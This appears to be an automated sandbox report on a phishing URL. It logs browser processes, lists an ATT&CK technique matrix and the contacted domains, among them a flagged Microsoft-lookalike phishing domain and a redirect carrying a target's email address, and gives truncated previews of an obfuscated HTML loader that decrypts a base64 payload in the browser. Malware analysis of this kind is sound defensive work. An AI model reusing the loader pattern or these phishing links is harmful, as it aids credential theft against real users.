Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir3976_755209614Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir3256_1208867069Jump to behavior
Source: classification engineClassification label: mal52.win@51/13@20/7
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\730862d1-2f7c-46c2-beaf-1f87665d08e6.tmpJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2332,i,1114976431534499065,153738974873917783,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:3
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html"
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --metrics-shmem-handle=1948,i,2868179512277568459,14568565378952564348,524288 --field-trial-handle=2028,i,3787505417702600662,9503551255279435640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2072 /prefetch:3
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Downloads\8ff754f5-7513-4298-9573-17aa31ff5b5c.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2332,i,1114976431534499065,153738974873917783,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:3Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --metrics-shmem-handle=1948,i,2868179512277568459,14568565378952564348,524288 --field-trial-handle=2028,i,3787505417702600662,9503551255279435640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2072 /prefetch:3Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --metrics-shmem-handle=1948,i,2868179512277568459,14568565378952564348,524288 --field-trial-handle=2028,i,3787505417702600662,9503551255279435640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2072 /prefetch:3Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions		1
Process Injection		11
Masquerading		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File Deletion		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1662266 URL: https://ucarecdn.com/6e80a8... Startdate: 10/04/2025 Architecture: WINDOWS Score: 52 32 Antivirus detection for URL or domain 2->32 34 AI detected suspicious Javascript 2->34 6 chrome.exe 14 2->6         started        9 chrome.exe 2 2->9         started        11 chrome.exe 2->11         started        13 chrome.exe 2->13         started        process3 dnsIp4 20 192.168.2.6, 138, 443, 49681 unknown unknown 6->20 15 chrome.exe 6->15         started        22 192.168.2.5 unknown unknown 9->22 18 chrome.exe 9->18         started        process5 dnsIp6 24 www.google.com 142.251.35.164, 443, 49694, 49718 GOOGLEUS United States 15->24 26 ucarecdn.com 151.101.130.132, 443, 49697, 49698 FASTLYUS United States 15->26 30 4 other IPs or domains 15->30 28 33vh88.perthshiregardenrooms.co.uk 18->28

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html0%Avira URL Cloudsafe

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://33vh88.perthshiregardenrooms.co.uk/aruberg@grahamgoldentech.com0%Avira URL Cloudsafe
https://downloadsharedfile.de/favicon.ico0%Avira URL Cloudsafe
https://downloadsharedfile.de/ph0%Avira URL Cloudsafe
https://microsoftonelineda48b13627.cometlogistics.co.uk/?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ100%Avira URL Cloudphishing

Domains and IPs

Download Network PCAP: filteredfull

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
cdnjs.cloudflare.com
104.17.24.14
truefalse
    		high
    33vh88.perthshiregardenrooms.co.uk
    		167.172.166.226
    		truefalse
      		unknown
      microsoftonelineda48b13627.cometlogistics.co.uk
      		167.172.166.226
      		truefalse
        		unknown
        downloadsharedfile.de
        		104.21.7.120
        		truefalse
          		high
          www.google.com
          		142.251.35.164
          		truefalse
            		high
            ucarecdn.com
            		151.101.130.132
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.htmlfalse
                		high
                http://c.pki.goog/r/gsr1.crlfalse
                  		high
                  http://c.pki.goog/r/r4.crlfalse
                    		high
                    https://33vh88.perthshiregardenrooms.co.uk/aruberg@grahamgoldentech.comfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://downloadsharedfile.de/phtrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://downloadsharedfile.de/favicon.icofalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                      		high
                      https://microsoftonelineda48b13627.cometlogistics.co.uk/?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      https://downloadsharedfile.de/ph#aruberg@grahamgoldentech.comfalse
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        104.17.24.14
                        		cdnjs.cloudflare.comUnited States
                        		13335CLOUDFLARENETUSfalse
                        104.21.7.120
                        		downloadsharedfile.deUnited States
                        		13335CLOUDFLARENETUSfalse
                        151.101.130.132
                        		ucarecdn.comUnited States
                        		54113FASTLYUSfalse
                        167.172.166.226
                        		33vh88.perthshiregardenrooms.co.ukUnited States
                        		14061DIGITALOCEAN-ASNUSfalse
                        142.251.35.164
                        		www.google.comUnited States
                        		15169GOOGLEUSfalse

                        Private

                        IP
                        192.168.2.6
                        192.168.2.5

                        General Information

                        Joe Sandbox version:42.0.0 Malachite
                        Analysis ID:1662266
                        Start date and time:2025-04-10 19:20:04 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 35s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:browseurl.jbs
                        Sample URL:https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:20
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal52.win@51/13@20/7
                        EGA Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, TextInputHost.exe
                        • Excluded IPs from analysis (whitelisted): 142.251.35.163, 142.250.80.46, 142.250.31.84, 172.217.165.142, 23.53.11.13, 142.251.32.99, 23.9.183.29, 172.202.163.200
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtCreateFile calls found.
                        • Report size getting too big, too many NtOpenFile calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASNs

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\Downloads\730862d1-2f7c-46c2-beaf-1f87665d08e6.tmp

                        Download File
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:HTML document, ASCII text, with very long lines (455)
                        Category:dropped
                        Size (bytes):1872
                        Entropy (8bit):5.391436007943997
                        Encrypted:false
                        SSDEEP:24:hU2CDf0tNVO73DHk3vo/ScHAHnQPnjaxu0WY7agH96P71N9dXHSUtW2seFtlBa7M:EMYk3vgHVN0WY+gHcpVBseblkiz
                        MD5:EB64D302C3E2871C4707F72637527FB5
                        SHA1:3469AC20B615D7F02CBA53794486F4D9B0E2C04F
                        SHA-256:8642BE05FDFC09717B79493BDE6FE6FB03760BBC76F9AFDD35B6184EE81381C5
                        SHA-512:AEA41118CD1B165AB3A8CE253BF47ABFE11D68B8FDA090B44D82C2AA350762AEBD9354CE0773A83CBE45D86068A5A1EE3B4A9250998914F9B962B9ED816500B9
                        Malicious:false
                        Reputation:low
                        Preview:<!DOCTYPE html>. <html lang="en">. <head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>. </head>. I find that the harder I work, the more luck I seem to have. -->. <script>. async function main() {. const xmvlumjb = Uint8Array.from(atob('F6j4mWE40gzeWhnZK1IvEEXHeV+M+wfqahVJCsghnJM='), c => c.charCodeAt(0));. const hkkfiiec = Uint8Array.from(atob('mIDrUBCYEQ3Vp6hB'), c => c.charCodeAt(0));. const IS = new Uint8Array([...atob('w3EK10c92Nk1hdqfUndYsv+uw+wm0rgj/T3jEoGty3rZyGrIuxKAfpT1XkMbyTf53Xfvr6zZNv7ZeGwxxdJ5XHkrJkEz8zf2tJGCqYvXoB0vg/Z7EyPykqafmp87K4OuC+xyG0sxi+Vf05uwCB7PHyzK9wyyiVHbC1Y6RBuuEWqWdZKg4O78lEu+nG+QTsESx/x6tZYOMv5qmDEOjmvJ34iDq0ULdDg2XNakCDc1qES2GScf4uRZetdY6vySrxE6GnhM9otf4IuhKP9brGfikmCggdMxtoqZ4LP55yaph0gFqQP2mqHavBaysaaLjuzmN/mWVj0iC59moJ1HLbQMbJe

                        C:\Users\user\Downloads\8ff754f5-7513-4298-9573-17aa31ff5b5c.html (copy)

                        Download File
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:HTML document, ASCII text, with very long lines (455)
                        Category:dropped
                        Size (bytes):1872
                        Entropy (8bit):5.391436007943997
                        Encrypted:false
                        SSDEEP:24:hU2CDf0tNVO73DHk3vo/ScHAHnQPnjaxu0WY7agH96P71N9dXHSUtW2seFtlBa7M:EMYk3vgHVN0WY+gHcpVBseblkiz
                        MD5:EB64D302C3E2871C4707F72637527FB5
                        SHA1:3469AC20B615D7F02CBA53794486F4D9B0E2C04F
                        SHA-256:8642BE05FDFC09717B79493BDE6FE6FB03760BBC76F9AFDD35B6184EE81381C5
                        SHA-512:AEA41118CD1B165AB3A8CE253BF47ABFE11D68B8FDA090B44D82C2AA350762AEBD9354CE0773A83CBE45D86068A5A1EE3B4A9250998914F9B962B9ED816500B9
                        Malicious:false
                        Reputation:low
                        Preview:<!DOCTYPE html>. <html lang="en">. <head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>. </head>. I find that the harder I work, the more luck I seem to have. -->. <script>. async function main() {. const xmvlumjb = Uint8Array.from(atob('F6j4mWE40gzeWhnZK1IvEEXHeV+M+wfqahVJCsghnJM='), c => c.charCodeAt(0));. const hkkfiiec = Uint8Array.from(atob('mIDrUBCYEQ3Vp6hB'), c => c.charCodeAt(0));. const IS = new Uint8Array([...atob('w3EK10c92Nk1hdqfUndYsv+uw+wm0rgj/T3jEoGty3rZyGrIuxKAfpT1XkMbyTf53Xfvr6zZNv7ZeGwxxdJ5XHkrJkEz8zf2tJGCqYvXoB0vg/Z7EyPykqafmp87K4OuC+xyG0sxi+Vf05uwCB7PHyzK9wyyiVHbC1Y6RBuuEWqWdZKg4O78lEu+nG+QTsESx/x6tZYOMv5qmDEOjmvJ34iDq0ULdDg2XNakCDc1qES2GScf4uRZetdY6vySrxE6GnhM9otf4IuhKP9brGfikmCggdMxtoqZ4LP55yaph0gFqQP2mqHavBaysaaLjuzmN/mWVj0iC59moJ1HLbQMbJe

                        C:\Users\user\Downloads\8ff754f5-7513-4298-9573-17aa31ff5b5c.html.crdownload (copy)

                        Download File
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:HTML document, ASCII text, with very long lines (455)
                        Category:dropped
                        Size (bytes):1872
                        Entropy (8bit):5.391436007943997
                        Encrypted:false
                        SSDEEP:24:hU2CDf0tNVO73DHk3vo/ScHAHnQPnjaxu0WY7agH96P71N9dXHSUtW2seFtlBa7M:EMYk3vgHVN0WY+gHcpVBseblkiz
                        MD5:EB64D302C3E2871C4707F72637527FB5
                        SHA1:3469AC20B615D7F02CBA53794486F4D9B0E2C04F
                        SHA-256:8642BE05FDFC09717B79493BDE6FE6FB03760BBC76F9AFDD35B6184EE81381C5
                        SHA-512:AEA41118CD1B165AB3A8CE253BF47ABFE11D68B8FDA090B44D82C2AA350762AEBD9354CE0773A83CBE45D86068A5A1EE3B4A9250998914F9B962B9ED816500B9
                        Malicious:false
                        Reputation:low
                        Preview:<!DOCTYPE html>. <html lang="en">. <head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>. </head>. I find that the harder I work, the more luck I seem to have. -->. <script>. async function main() {. const xmvlumjb = Uint8Array.from(atob('F6j4mWE40gzeWhnZK1IvEEXHeV+M+wfqahVJCsghnJM='), c => c.charCodeAt(0));. const hkkfiiec = Uint8Array.from(atob('mIDrUBCYEQ3Vp6hB'), c => c.charCodeAt(0));. const IS = new Uint8Array([...atob('w3EK10c92Nk1hdqfUndYsv+uw+wm0rgj/T3jEoGty3rZyGrIuxKAfpT1XkMbyTf53Xfvr6zZNv7ZeGwxxdJ5XHkrJkEz8zf2tJGCqYvXoB0vg/Z7EyPykqafmp87K4OuC+xyG0sxi+Vf05uwCB7PHyzK9wyyiVHbC1Y6RBuuEWqWdZKg4O78lEu+nG+QTsESx/x6tZYOMv5qmDEOjmvJ34iDq0ULdDg2XNakCDc1qES2GScf4uRZetdY6vySrxE6GnhM9otf4IuhKP9brGfikmCggdMxtoqZ4LP55yaph0gFqQP2mqHavBaysaaLjuzmN/mWVj0iC59moJ1HLbQMbJe

                        Chrome Cache Entry: 159

                        Download File
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:HTML document, ASCII text, with very long lines (455)
                        Category:downloaded
                        Size (bytes):1872
                        Entropy (8bit):5.391436007943997
                        Encrypted:false
                        SSDEEP:24:hU2CDf0tNVO73DHk3vo/ScHAHnQPnjaxu0WY7agH96P71N9dXHSUtW2seFtlBa7M:EMYk3vgHVN0WY+gHcpVBseblkiz
                        MD5:EB64D302C3E2871C4707F72637527FB5
                        SHA1:3469AC20B615D7F02CBA53794486F4D9B0E2C04F
                        SHA-256:8642BE05FDFC09717B79493BDE6FE6FB03760BBC76F9AFDD35B6184EE81381C5
                        SHA-512:AEA41118CD1B165AB3A8CE253BF47ABFE11D68B8FDA090B44D82C2AA350762AEBD9354CE0773A83CBE45D86068A5A1EE3B4A9250998914F9B962B9ED816500B9
                        Malicious:false
                        Reputation:low
                        URL:https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html
                        Preview:<!DOCTYPE html>. <html lang="en">. <head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>. </head>. I find that the harder I work, the more luck I seem to have. -->. <script>. async function main() {. const xmvlumjb = Uint8Array.from(atob('F6j4mWE40gzeWhnZK1IvEEXHeV+M+wfqahVJCsghnJM='), c => c.charCodeAt(0));. const hkkfiiec = Uint8Array.from(atob('mIDrUBCYEQ3Vp6hB'), c => c.charCodeAt(0));. const IS = new Uint8Array([...atob('w3EK10c92Nk1hdqfUndYsv+uw+wm0rgj/T3jEoGty3rZyGrIuxKAfpT1XkMbyTf53Xfvr6zZNv7ZeGwxxdJ5XHkrJkEz8zf2tJGCqYvXoB0vg/Z7EyPykqafmp87K4OuC+xyG0sxi+Vf05uwCB7PHyzK9wyyiVHbC1Y6RBuuEWqWdZKg4O78lEu+nG+QTsESx/x6tZYOMv5qmDEOjmvJ34iDq0ULdDg2XNakCDc1qES2GScf4uRZetdY6vySrxE6GnhM9otf4IuhKP9brGfikmCggdMxtoqZ4LP55yaph0gFqQP2mqHavBaysaaLjuzmN/mWVj0iC59moJ1HLbQMbJe

                        Chrome Cache Entry: 160

                        Download File
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:HTML document, ASCII text
                        Category:downloaded
                        Size (bytes):315
                        Entropy (8bit):5.0572271090563765
                        Encrypted:false
                        SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                        MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                        SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                        SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                        SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                        Malicious:false
                        Reputation:low
                        URL:https://downloadsharedfile.de/favicon.ico
                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

                        Chrome Cache Entry: 161

                        Download File
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (48316), with no line terminators
                        Category:downloaded
                        Size (bytes):48316
                        Entropy (8bit):5.6346993394709
                        Encrypted:false
                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                        MD5:2CA03AD87885AB983541092B87ADB299
                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                        Malicious:false
                        Reputation:low
                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();

                        Chrome Cache Entry: 162

                        Download File
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:HTML document, ASCII text
                        Category:downloaded
                        Size (bytes):351
                        Entropy (8bit):5.210005812732593
                        Encrypted:false
                        SSDEEP:6:hxuJ9xVgY2pCXLx95VV4nJEx/QNH3BY2GRGRNHF59fHIBijASPska5HcTT4EINwu:hYzxVyCbxT4nJEx/QN/GRGr/ZVvPFoH7
                        MD5:30E324B6B6FB6C7F1BAF9A321122EFDE
                        SHA1:DCCD1AFE93AF7A0366E9D8D3E5AEC85F66D80C11
                        SHA-256:7D03AD51CBEB4A39811F4BB50DDE97159CADD58D665FF81B70B6D2AF65B324D6
                        SHA-512:9E5BD04748A93A22821BE03C6F404F85E71C65B855D910A888FF2CAB89863E169DB209A8E0FFC256D628A17DB53F88FDD34CC87B79BBBF0C4C47AF3AF3116D4D
                        Malicious:false
                        Reputation:low
                        URL:https://microsoftonelineda48b13627.cometlogistics.co.uk/?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ
